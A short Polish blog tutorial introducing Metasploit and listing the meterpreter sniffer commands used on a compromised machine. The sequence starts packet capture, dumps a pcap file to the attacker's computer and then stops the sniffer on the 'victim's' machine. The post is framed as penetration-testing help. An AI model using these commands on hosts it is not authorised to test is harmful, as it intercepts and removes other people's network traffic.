Informatyka

Jeżeli ktoś jeszcze nie zna platformy Metasploit zapraszam do artykułu na wikipedii http://en.wikipedia.org/wiki/Metasploit_Project.

W skrócie jest to platforma przeznaczona głównie do przeprowadzania testów penetracyjnych sieci. Zawiera ogromną bibliotekę exploitów i różnego rodzaju innych przydatnych narzędzi.

Ostatnio dodano nową funkcjonalność (jak na razie tylko do wersji developerskiej) polegającą na możliwości użycia sniffera. Rozszerzenie to działa w ramach meterpretera i daje zupełnie nowe możliwości dla specjalistów przeprowadzających testy penetracyjne. Aby skorzystać z rozszerzenia należy najpierw dokonać updatu Metasploita. Następnie na komputerze z uruchomionym meterpreterem używamy komend:

use sniffer (włączenie modułu do sniffowania)

sniffer_interfaces (pokazuje dostępne interfejsy sieciowe)

sniffer_start numer_interfejsu wielkość_bufora_zapisu (w tym miejscu już uruchamiamy sniffera… polecenie może wyglądać np. tak sniffer_start 1 25000)

W trakcie sniffowania możemy używać komendy „sniffer_stats 1″ (gdzie 1 to wybrany przeze mnie interfejs). Pokaże nam to statystyki związane np. z ilością pakietów które zostały zapisane.

Ostatnim krokiem jest skopiowanie pliku pcap na nasz komputer – komenda:

sniffer_dump 1 /capture.pcap

A na koniec warto wyłączyć sniffera na komputerze ofiary:

sniffer_stop 1

I to by było na tyle.